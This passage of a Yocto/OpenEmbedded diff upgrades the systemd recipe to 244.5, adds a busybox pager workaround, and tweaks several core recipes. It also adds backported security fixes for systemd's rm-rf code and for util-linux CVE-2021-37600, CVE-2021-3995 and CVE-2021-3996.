+         /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+-         * fd, in all cases, including on failure.. */
++         * fd, in all cases, including on failure. */
++
++        d = fdopendir(fd);
++        if (!d) {
++                safe_close(fd);
++                return -errno;
++        }
+ 
+         if (!(flags & REMOVE_PHYSICAL)) {
++                struct statfs sfs;
+ 
+-                r = fstatfs(fd, &sfs);
+-                if (r < 0) {
+-                        safe_close(fd);
++                if (fstatfs(dirfd(d), &sfs) < 0)
+                         return -errno;
+                 }
+ 
+                 if (is_physical_fs(&sfs)) {
+-                        /* We refuse to clean physical file systems with this call,
+-                         * unless explicitly requested. This is extra paranoia just
+-                         * to be sure we never ever remove non-state data. */
++                        /* We refuse to clean physical file systems with this call, unless explicitly
++                         * requested. This is extra paranoia just to be sure we never ever remove non-state
++                         * data. */
++
+                         _cleanup_free_ char *path = NULL;
+ 
+                         (void) fd_get_path(fd, &path);
+-                        log_error("Attempted to remove disk file system under \"%s\", and we can't allow that.",
+-                                  strna(path));
+-
+-                        safe_close(fd);
+-                        return -EPERM;
++                        return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++                                               "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++                                               strna(path));
+                 }
+         }
+ 
+-        d = fdopendir(fd);
+-        if (!d) {
+-                safe_close(fd);
+-                return errno == ENOENT ? 0 : -errno;
+-        }
+-
+         FOREACH_DIRENT_ALL(de, d, return -errno) {
+-                bool is_dir;
+-                struct stat st;
++                int is_dir;
+ 
+                 if (dot_or_dot_dot(de->d_name))
+                         continue;
+ 
+-                if (de->d_type == DT_UNKNOWN ||
+-                    (de->d_type == DT_DIR && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
+-                        if (fstatat(fd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) < 0) {
+-                                if (ret == 0 && errno != ENOENT)
+-                                        ret = -errno;
+-                                continue;
+-                        }
+-
+-                        is_dir = S_ISDIR(st.st_mode);
+-                } else
+-                        is_dir = de->d_type == DT_DIR;
+-
+-                if (is_dir) {
+-                        _cleanup_close_ int subdir_fd = -1;
+-
+-                        /* if root_dev is set, remove subdirectories only if device is same */
+-                        if (root_dev && st.st_dev != root_dev->st_dev)
+-                                continue;
+-
+-                        subdir_fd = openat(fd, de->d_name, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+-                        if (subdir_fd < 0) {
+-                                if (ret == 0 && errno != ENOENT)
+-                                        ret = -errno;
+-                                continue;
+-                        }
+-
+-                        /* Stop at mount points */
+-                        r = fd_is_mount_point(fd, de->d_name, 0);
+-                        if (r < 0) {
+-                                if (ret == 0 && r != -ENOENT)
+-                                        ret = r;
+-
+-                                continue;
+-                        }
+-                        if (r > 0)
+-                                continue;
+-
+-                        if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+-                                /* This could be a subvolume, try to remove it */
+-
+-                                r = btrfs_subvol_remove_fd(fd, de->d_name, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+-                                if (r < 0) {
+-                                        if (!IN_SET(r, -ENOTTY, -EINVAL)) {
+-                                                if (ret == 0)
+-                                                        ret = r;
+-
+-                                                continue;
+-                                        }
+-
+-                                        /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
+-                                } else
+-                                        /* It was a subvolume, continue. */
+-                                        continue;
+-                        }
+-
+-                        /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file
+-                         * system type again for each directory */
+-                        r = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+-                        if (r < 0 && ret == 0)
+-                                ret = r;
+-
+-                        if (unlinkat(fd, de->d_name, AT_REMOVEDIR) < 0) {
+-                                if (ret == 0 && errno != ENOENT)
+-                                        ret = -errno;
+-                        }
+-
+-                } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+-
+-                        if (unlinkat(fd, de->d_name, 0) < 0) {
+-                                if (ret == 0 && errno != ENOENT)
+-                                        ret = -errno;
+-                        }
+-                }
++                is_dir =
++                        de->d_type == DT_UNKNOWN ? -1 :
++                        de->d_type == DT_DIR;
++
++                r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
++                if (r < 0 && r != -ENOENT && ret == 0)
++                        ret = r;
+         }
++
+         return ret;
+ }
+ 
+ int rm_rf(const char *path, RemoveFlags flags) {
+         int fd, r;
+-        struct statfs s;
+ 
+         assert(path);
+ 
+@@ -195,9 +210,10 @@
+                 if (FLAGS_SET(flags, REMOVE_ROOT)) {
+ 
+                         if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++                                struct statfs s;
++
+                                 if (statfs(path, &s) < 0)
+                                         return -errno;
+-
+                                 if (is_physical_fs(&s))
+                                         return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+                                                                "Attempted to remove files from a disk file system under \"%s\", refusing.",
+@@ -225,3 +241,22 @@
+ 
+         return r;
+ }
++
++int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
++
++        /* Removes one specific child of the specified directory */
++
++        if (fd < 0)
++                return -EBADF;
++
++        if (!filename_is_valid(name))
++                return -EINVAL;
++
++        if ((flags & (REMOVE_ROOT|REMOVE_MISSING_OK)) != 0) /* Doesn't really make sense here, we are not supposed to remove 'fd' anyway */
++                return -EINVAL;
++
++        if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
++                return -EINVAL;
++
++        return rm_rf_children_inner(fd, name, -1, flags, NULL);
++}
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -13,7 +13,8 @@
+         REMOVE_MISSING_OK       = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
+ } RemoveFlags;
+ 
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev);
++int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
++int rm_rf_child(int fd, const char *name, RemoveFlags flags);
+ int rm_rf(const char *path, RemoveFlags flags);
+ 
+ /* Useful for usage with _cleanup_(), destroys a directory and frees the pointer */
diff --git a/meta/recipes-core/systemd/systemd/systemd-pager.sh b/meta/recipes-core/systemd/systemd/systemd-pager.sh
new file mode 100644
index 0000000000..86e3e0ab78
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/systemd-pager.sh
@@ -0,0 +1,7 @@
+# Systemd expect a color capable pager, however the less provided
+# by busybox is not. This make many interaction with systemd pretty
+# annoying. As a workaround we disable the systemd pager if less
+# is not the GNU version.
+if ! less -V > /dev/null 2>&1 ; then
+	export SYSTEMD_PAGER=
+fi
diff --git a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch b/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
deleted file mode 100644
index 27b2b60fad..0000000000
--- a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 0335d110afc08baf47d76b7011ce02510dfdd524 Mon Sep 17 00:00:00 2001
-From: Valery0xff <valery.chernous@gmail.com>
-Date: Wed, 11 Mar 2020 02:20:36 +0200
-Subject: [PATCH] udev: fix SECLABEL{selinux} issue (#15064)
-
-Add SECLABEL{selinux}="some value" cause udevadm crash
-systemd-udevd[x]: Worker [x] terminated by signal 11 (SEGV)
- 
-It happens since 25de7aa7b90 (Yu Watanabe 2019-04-25 01:21:11 +0200)
-when udev rules processing changed to token model. Yu forgot store
-attr to SECLABEL token so fix it.
----
- src/udev/udev-rules.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-Upstream-Status: Backport [https://github.com/systemd/systemd/commit/0335d110afc08baf47d76b7011ce02510dfdd524.patch]
----
-diff --git a/src/udev/udev-rules.c b/src/udev/udev-rules.c
-index b9b350d1ef..b990f68e93 100644
---- a/src/udev/udev-rules.c
-+++ b/src/udev/udev-rules.c
-@@ -921,7 +921,7 @@ static int parse_token(UdevRules *rules, const char *key, char *attr, UdevRuleOp
-                         op = OP_ASSIGN;
-                 }
- 
--                r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, NULL);
-+                r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, attr);
-         } else if (streq(key, "RUN")) {
-                 if (is_match || op == OP_REMOVE)
-                         return log_token_invalid_op(rules, key);
diff --git a/meta/recipes-core/systemd/systemd_244.3.bb b/meta/recipes-core/systemd/systemd_244.5.bb
index 64e3b18333..8b2f47b92f 100644
--- a/meta/recipes-core/systemd/systemd_244.3.bb
+++ b/meta/recipes-core/systemd/systemd_244.5.bb
@@ -18,10 +18,28 @@ SRC_URI += "file://touchscreen.rules \
            file://00-create-volatile.conf \
            file://init \
            file://99-default.preset \
+           file://systemd-pager.sh \
            file://0001-binfmt-Don-t-install-dependency-links-at-install-tim.patch \
            file://0003-implment-systemd-sysv-install-for-OE.patch \
-           file://CVE-2020-13776.patch \
-           file://systemd-udev-seclabel-options-crash-fix.patch \
+           file://CVE-2021-33910.patch \
+           file://CVE-2020-13529.patch \
+           file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \
+           file://introduce-ordered_set_clear-free-with-destructor.patch \
+           file://network-add-skeleton-of-request-queue.patch \
+           file://network-merge-link_drop-and-link_detach_from_manager.patch \
+           file://network-also-drop-requests-when-link-enters-linger-state.patch \
+           file://network-fix-Link-reference-counter-issue.patch \
+           file://rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch \
+           file://rm-rf-optionally-fsync-after-removing-directory-tree.patch \
+           file://CVE-2018-21029.patch \
+           file://CVE-2021-3997-1.patch \
+           file://CVE-2021-3997-2.patch \
+           file://CVE-2021-3997-3.patch \
+           file://CVE-2022-3821.patch \
+           file://CVE-2023-26604-1.patch \
+           file://CVE-2023-26604-2.patch \
+           file://CVE-2023-26604-3.patch \
+           file://CVE-2023-26604-4.patch \
            "
 
 # patches needed by musl
@@ -51,6 +69,9 @@ SRC_URI_MUSL = "\
                file://0004-src-shared-cpu-set-util.h-add-__cpu_mask-definition.patch \
                "
 
+# already applied in 244.5
+CVE_CHECK_WHITELIST += "CVE-2020-13776"
+
 PAM_PLUGINS = " \
     pam-plugin-unix \
     pam-plugin-loginuid \
@@ -87,6 +108,7 @@ PACKAGECONFIG ??= " \
     timesyncd \
     utmp \
     vconsole \
+    wheel-group \
     xz \
 "
 
@@ -147,6 +169,7 @@ PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native xmlto-native do
 PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd"
 PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname"
 PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false"
+PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="
 PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false"
 PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false"
 PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false"
@@ -179,6 +202,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true"
 PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false"
 PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind"
 PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup"
+PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false"
 # Verify keymaps on locale change
 PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon"
 PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz"
@@ -196,10 +220,12 @@ rootlibexecdir = "${rootprefix}/lib"
 EXTRA_OEMESON += "-Dlink-udev-shared=false"
 
 EXTRA_OEMESON += "-Dnobody-user=nobody \
-                  -Dnobody-group=nobody \
+                  -Dnobody-group=nogroup \
                   -Drootlibdir=${rootlibdir} \
                   -Drootprefix=${rootprefix} \
                   -Ddefault-locale=C \
+                  -Dsystem-uid-max=999 \
+                  -Dsystem-gid-max=999 \
                   "
 
 # Hardcode target binary paths to avoid using paths from sysroot
@@ -297,6 +323,9 @@ do_install() {
 	# install default policy for presets
 	# https://www.freedesktop.org/wiki/Software/systemd/Preset/#howto
 	install -Dm 0644 ${WORKDIR}/99-default.preset ${D}${systemd_unitdir}/system-preset/99-default.preset
+
+	# add a profile fragment to disable systemd pager with busybox less
+	install -Dm 0644 ${WORKDIR}/systemd-pager.sh ${D}${sysconfdir}/profile.d/systemd-pager.sh
 }
 
 python populate_packages_prepend (){
@@ -384,9 +413,9 @@ FILES_${PN}-binfmt = "${sysconfdir}/binfmt.d/ \
                       ${rootlibexecdir}/systemd/systemd-binfmt \
                       ${systemd_unitdir}/system/proc-sys-fs-binfmt_misc.* \
                       ${systemd_unitdir}/system/systemd-binfmt.service"
-RRECOMMENDS_${PN}-binfmt = "kernel-module-binfmt-misc"
+RRECOMMENDS_${PN}-binfmt = "${@bb.utils.contains('PACKAGECONFIG', 'binfmt', 'kernel-module-binfmt-misc', '', d)}"
 
-RRECOMMENDS_${PN}-vconsole-setup = "kbd kbd-consolefonts kbd-keymaps"
+RRECOMMENDS_${PN}-vconsole-setup = "${@bb.utils.contains('PACKAGECONFIG', 'vconsole', 'kbd kbd-consolefonts kbd-keymaps', '', d)}"
 
 
 FILES_${PN}-journal-gatewayd = "${rootlibexecdir}/systemd/systemd-journal-gatewayd \
@@ -519,6 +548,7 @@ FILES_${PN} = " ${base_bindir}/* \
                 ${sysconfdir}/dbus-1/ \
                 ${sysconfdir}/modules-load.d/ \
                 ${sysconfdir}/pam.d/ \
+                ${sysconfdir}/profile.d/ \
                 ${sysconfdir}/sysctl.d/ \
                 ${sysconfdir}/systemd/ \
                 ${sysconfdir}/tmpfiles.d/ \
diff --git a/meta/recipes-core/sysvinit/sysvinit/rc b/meta/recipes-core/sysvinit/sysvinit/rc
index fd1fdd26ba..d0d3149821 100755
--- a/meta/recipes-core/sysvinit/sysvinit/rc
+++ b/meta/recipes-core/sysvinit/sysvinit/rc
@@ -63,7 +63,7 @@ startup() {
   stty onlcr 0>&1
 
   # Limit stack size for startup scripts
-  [ "$STACK_SIZE" == "" ] || ulimit -S -s $STACK_SIZE
+  [ "$STACK_SIZE" = "" ] || ulimit -S -s $STACK_SIZE
 
   # Now find out what the current and what the previous runlevel are.
 
diff --git a/meta/recipes-core/udev/eudev/init b/meta/recipes-core/udev/eudev/init
index 0455ade258..c60dbbf6d5 100644
--- a/meta/recipes-core/udev/eudev/init
+++ b/meta/recipes-core/udev/eudev/init
@@ -52,7 +52,7 @@ case "$1" in
     kill_udevd > "/dev/null" 2>&1
 
     # trigger the sorted events
-    [ -e /proc/sys/kernel/hotplug ] && echo -e '\000' >/proc/sys/kernel/hotplug
+    [ -e /proc/sys/kernel/hotplug ] && printf '\0\n' >/proc/sys/kernel/hotplug
     @UDEVD@ -d
 
     udevadm control --env=STARTUP=1
diff --git a/meta/recipes-core/udev/eudev_3.2.9.bb b/meta/recipes-core/udev/eudev_3.2.9.bb
index f96f8cbe78..3ae91dee51 100644
--- a/meta/recipes-core/udev/eudev_3.2.9.bb
+++ b/meta/recipes-core/udev/eudev_3.2.9.bb
@@ -1,5 +1,6 @@
 SUMMARY = "eudev is a fork of systemd's udev"
 HOMEPAGE = "https://wiki.gentoo.org/wiki/Eudev"
+DESCRIPTION = "eudev is Gentoo's fork of udev, systemd's device file manager for the Linux kernel. It manages device nodes in /dev and handles all user space actions when adding or removing devices."
 LICENSE = "GPLv2.0+ & LGPL-2.1+"
 LICENSE_libudev = "LGPL-2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
index 75632d9434..daee5c224b 100644
--- a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
+++ b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
@@ -6,8 +6,8 @@ SECTION = "base"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9"
 
-SRC_URI = "git://git.yoctoproject.org/update-rc.d"
-SRCREV = "4b150b25b38de688d25cde2b2d22c268ed65a748"
+SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master"
+SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac"
 
 UPSTREAM_CHECK_COMMITS = "1"
 
diff --git a/meta/recipes-core/util-linux/util-linux.inc b/meta/recipes-core/util-linux/util-linux.inc
index 0e85603d9a..7b780352be 100644
--- a/meta/recipes-core/util-linux/util-linux.inc
+++ b/meta/recipes-core/util-linux/util-linux.inc
@@ -59,12 +59,13 @@ python util_linux_binpackages () {
                     continue
 
                 pkg = os.path.basename(os.readlink(file))
-                extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1)
+                extras.setdefault(pkg, [])
+                extras[pkg].append(file.replace(dvar, '', 1))
 
     pn = d.getVar('PN')
     for pkg, links in extras.items():
         of = d.getVar('FILES_' + pn + '-' + pkg)
-        links = of + links
+        links = of + " " + " ".join(sorted(links))
         d.setVar('FILES_' + pn + '-' + pkg, links)
 }
 
@@ -94,7 +95,7 @@ EXTRA_OECONF = "\
     \
     --disable-bfs --disable-chfn-chsh --disable-login \
     --disable-makeinstall-chown --disable-minix --disable-newgrp \
-    --disable-use-tty-group --disable-vipw \
+    --disable-use-tty-group --disable-vipw --disable-raw \
     \
     --without-udev \
     \
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
new file mode 100644
index 0000000000..2b306c435b
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
@@ -0,0 +1,33 @@
+From 1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 27 Jul 2021 11:58:31 +0200
+Subject: [PATCH] sys-utils/ipcutils: be careful when call calloc() for uint64
+ nmembs
+
+Fix: https://github.com/karelzak/util-linux/issues/1395
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-37600
+Upstream-Status: Backport [1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c]
+
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ sys-utils/ipcutils.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/sys-utils/ipcutils.c b/sys-utils/ipcutils.c
+index e784c4dcb..18868cfd3 100644
+--- a/sys-utils/ipcutils.c
++++ b/sys-utils/ipcutils.c
+@@ -218,7 +218,7 @@ static void get_sem_elements(struct sem_data *p)
+ {
+ 	size_t i;
+ 
+-	if (!p || !p->sem_nsems || p->sem_perm.id < 0)
++	if (!p || !p->sem_nsems || p->sem_nsems > SIZE_MAX || p->sem_perm.id < 0)
+ 		return;
+ 
+ 	p->elements = xcalloc(p->sem_nsems, sizeof(struct sem_elem));
+-- 
+2.25.1
+
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
new file mode 100644
index 0000000000..1dcb66ad1d
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
@@ -0,0 +1,139 @@
+From f3db9bd609494099f0c1b95231c5dfe383346929 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Wed, 24 Nov 2021 13:53:25 +0100
+Subject: [PATCH] libmount: fix UID check for FUSE umount [CVE-2021-3995]
+
+Improper UID check allows an unprivileged user to unmount FUSE
+filesystems of users with similar UID.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3995
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/f3db9bd609494099f0c1b95231c5dfe383346929]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h            |  2 +-
+ libmount/src/context_umount.c | 14 +++---------
+ libmount/src/mountP.h         |  1 +
+ libmount/src/optstr.c         | 42 +++++++++++++++++++++++++++++++++++
+ 4 files changed, 47 insertions(+), 12 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index 6e95707ea9..a84d29594d 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -91,8 +91,8 @@ static inline char *mem2strcpy(char *dest, const void *src, size_t n, size_t nma
+ 	if (n + 1 > nmax)
+ 		n = nmax - 1;
+ 
++	memset(dest, '\0', nmax);
+ 	memcpy(dest, src, n);
+-	dest[nmax-1] = '\0';
+ 	return dest;
+ }
+ 
+diff --git a/libmount/src/context_umount.c b/libmount/src/context_umount.c
+index 173637a15a..8773c65ffa 100644
+--- a/libmount/src/context_umount.c
++++ b/libmount/src/context_umount.c
+@@ -393,10 +393,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ 	struct libmnt_ns *ns_old;
+ 	const char *type = mnt_fs_get_fstype(cxt->fs);
+ 	const char *optstr;
+-	char *user_id = NULL;
+-	size_t sz;
+-	uid_t uid;
+-	char uidstr[sizeof(stringify_value(ULONG_MAX))];
++	uid_t uid, entry_uid;
+ 
+ 	*errsv = 0;
+ 
+@@ -413,11 +410,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ 	optstr = mnt_fs_get_fs_options(cxt->fs);
+ 	if (!optstr)
+ 		return 0;
+-
+-	if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
+-		return 0;
+-
+-	if (sz == 0 || user_id == NULL)
++	if (mnt_optstr_get_uid(optstr, "user_id", &entry_uid) != 0)
+ 		return 0;
+ 
+ 	/* get current user */
+@@ -434,8 +427,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ 		return 0;
+ 	}
+ 
+-	snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
+-	return strncmp(user_id, uidstr, sz) == 0;
++	return uid == entry_uid;
+ }
+ 
+ /*
+diff --git a/libmount/src/mountP.h b/libmount/src/mountP.h
+index d43a835418..22442ec55e 100644
+--- a/libmount/src/mountP.h
++++ b/libmount/src/mountP.h
+@@ -400,6 +400,7 @@ extern const struct libmnt_optmap *mnt_optmap_get_entry(
+ 			     const struct libmnt_optmap **mapent);
+ 
+ /* optstr.c */
++extern int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid);
+ extern int mnt_optstr_remove_option_at(char **optstr, char *begin, char *end);
+ extern int mnt_optstr_fix_gid(char **optstr, char *value, size_t valsz, char **next);
+ extern int mnt_optstr_fix_uid(char **optstr, char *value, size_t valsz, char **next);
+diff --git a/libmount/src/optstr.c b/libmount/src/optstr.c
+index 921b9318e7..16800f571c 100644
+--- a/libmount/src/optstr.c
++++ b/libmount/src/optstr.c
+@@ -1090,6 +1090,48 @@ int mnt_optstr_fix_user(char **optstr)
+ 	return rc;
+ }
+ 
++/*
++ * Converts value from @optstr addressed by @name to uid.
++ *
++ * Returns: 0 on success, 1 if not found, <0 on error
++ */
++int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid)
++{
++	char *value = NULL;
++	size_t valsz = 0;
++	char buf[sizeof(stringify_value(UINT64_MAX))];
++	int rc;
++	uint64_t num;
++
++	assert(optstr);
++	assert(name);
++	assert(uid);
++
++	rc = mnt_optstr_get_option(optstr, name, &value, &valsz);
++	if (rc != 0)
++		goto fail;
++
++	if (valsz > sizeof(buf) - 1) {
++		rc = -ERANGE;
++		goto fail;
++	}
++	mem2strcpy(buf, value, valsz, sizeof(buf));
++
++	rc = ul_strtou64(buf, &num, 10);
++	if (rc != 0)
++		goto fail;
++	if (num > ULONG_MAX || (uid_t) num != num) {
++		rc = -ERANGE;
++		goto fail;
++	}
++	*uid = (uid_t) num;
++
++	return 0;
++fail:
++	DBG(UTILS, ul_debug("failed to convert '%s'= to number [rc=%d]", name, rc));
++	return rc;
++}
++
+ /**
+  * mnt_match_options:
+  * @optstr: options string
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
new file mode 100644
index 0000000000..1610b5a0fe
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
@@ -0,0 +1,226 @@
+From 018a10907fa9885093f6d87401556932c2d8bd2b Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 4 Jan 2022 10:54:20 +0100
+Subject: [PATCH] libmount: fix (deleted) suffix issue [CVE-2021-3996]
+
+This issue is related to parsing the /proc/self/mountinfo file allows an
+unprivileged user to unmount other user's filesystems that are either
+world-writable themselves or mounted in a world-writable directory.
+
+The support for "(deleted)" is no more necessary as the Linux kernel does
+not use it in /proc/self/mountinfo and /proc/self/mount files anymore.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3996
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/018a10907fa9885093f6d87401556932c2d8bd2b]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ libmount/src/tab_parse.c                            |  5 -----
+ tests/expected/findmnt/filter-options               |  1 -
+ tests/expected/findmnt/filter-options-nameval-neg   |  3 +--
+ tests/expected/findmnt/filter-types-neg             |  1 -
+ tests/expected/findmnt/outputs-default              |  3 +--
+ tests/expected/findmnt/outputs-force-tree           |  3 +--
+ tests/expected/findmnt/outputs-kernel               |  3 +--
+ tests/expected/libmount/tabdiff-mount               |  1 -
+ tests/expected/libmount/tabdiff-move                |  1 -
+ tests/expected/libmount/tabdiff-remount             |  1 -
+ tests/expected/libmount/tabdiff-umount              |  1 -
+ tests/expected/libmount/tabfiles-parse-mountinfo    | 11 -----------
+ tests/expected/libmount/tabfiles-py-parse-mountinfo | 11 -----------
+ tests/ts/findmnt/files/mountinfo                    |  1 -
+ tests/ts/findmnt/files/mountinfo-nonroot            |  1 -
+ tests/ts/libmount/files/mountinfo                   |  1 -
+ 16 files changed, 4 insertions(+), 44 deletions(-)
+
+diff --git a/libmount/src/tab_parse.c b/libmount/src/tab_parse.c
+index 917779ab6d..4407f9c9c7 100644
+--- a/libmount/src/tab_parse.c
++++ b/libmount/src/tab_parse.c
+@@ -225,11 +225,6 @@ static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
+ 		goto fail;
+ 	}
+ 
+-	/* remove "\040(deleted)" suffix */
+-	p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
+-	if (p && *p)
+-		*p = '\0';
+-
+ 	s = skip_separator(s);
+ 
+ 	/* (6) vfs options (fs-independent) */
+diff --git a/tests/expected/findmnt/filter-options b/tests/expected/findmnt/filter-options
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-options
++++ b/tests/expected/findmnt/filter-options
+@@ -28,5 +28,4 @@ TARGET                       SOURCE           FSTYPE                OPTIONS
+ /home/kzak/.gvfs             gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ /var/lib/nfs/rpc_pipefs      sunrpc           rpc_pipefs            rw,relatime
+ /mnt/sounds                  //foo.home/bar/  cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo                     /fooooo          bar                   rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/filter-options-nameval-neg b/tests/expected/findmnt/filter-options-nameval-neg
+index 5471d65af1..f0467ef755 100644
+--- a/tests/expected/findmnt/filter-options-nameval-neg
++++ b/tests/expected/findmnt/filter-options-nameval-neg
+@@ -29,6 +29,5 @@ TARGET                         SOURCE                FSTYPE                OPTIO
+ |-/home/kzak                   /dev/mapper/kzak-home ext4                  rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs           gvfs-fuse-daemon      fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs      sunrpc                rpc_pipefs            rw,relatime
+-|-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo                     /fooooo               bar                   rw,relatime
++`-/mnt/sounds                  //foo.home/bar/       cifs                  rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/filter-types-neg b/tests/expected/findmnt/filter-types-neg
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-types-neg
++++ b/tests/expected/findmnt/filter-types-neg
+@@ -28,5 +28,4 @@ TARGET                       SOURCE           FSTYPE                OPTIONS
+ /home/kzak/.gvfs             gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
